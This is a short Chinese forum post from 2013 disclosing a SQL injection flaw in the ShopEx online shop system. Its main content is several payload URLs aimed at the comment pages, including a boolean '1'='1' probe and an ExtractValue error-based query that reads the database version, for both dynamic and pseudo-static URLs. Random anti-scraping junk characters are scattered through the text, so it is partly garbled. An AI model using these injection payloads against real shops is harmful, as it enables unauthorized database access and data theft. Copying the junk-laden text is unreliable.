注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…9 ?2 d2 b( t0 \, D
, q# L+ I$ ]) A1 A
好吧,我扯远了~~% o# X3 n8 T& a) E9 m
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~, l' J( q* `9 F& O' S7 H3 Y9 j5 e
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:# S1 `5 a3 [9 a7 @% Y, I, ^
% P# M; D7 [0 i( T2 G0 ]: Bhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
1 ]3 r7 j" I0 x6 k7 {" A \
9 h, U% A9 H6 dhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html+ N' B O- D; k2 m$ x2 H1 Q# j }
/ S* x/ x- d: q7 C( \+ A! W3 j. a
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
( |1 b1 n0 x* D5 ^3 N
' z/ |! _7 U* L: O0 h3 F9 O+ T4 t) }http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html) ]0 G4 \! H; \
: f; N* f1 r4 L, j
) l9 q' y/ K2 C/ [/ z' J: `一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
& R( M# y8 | n5 M7 R2 L) Z如何注入就不多说了,10多年的东西了…不会也会了…
* H" `0 |7 S J1 {8 {. \9 l6 F8 L3 a' y7 U% E
|
发表于 2013-2-4 16:20:04
收藏
支持
反对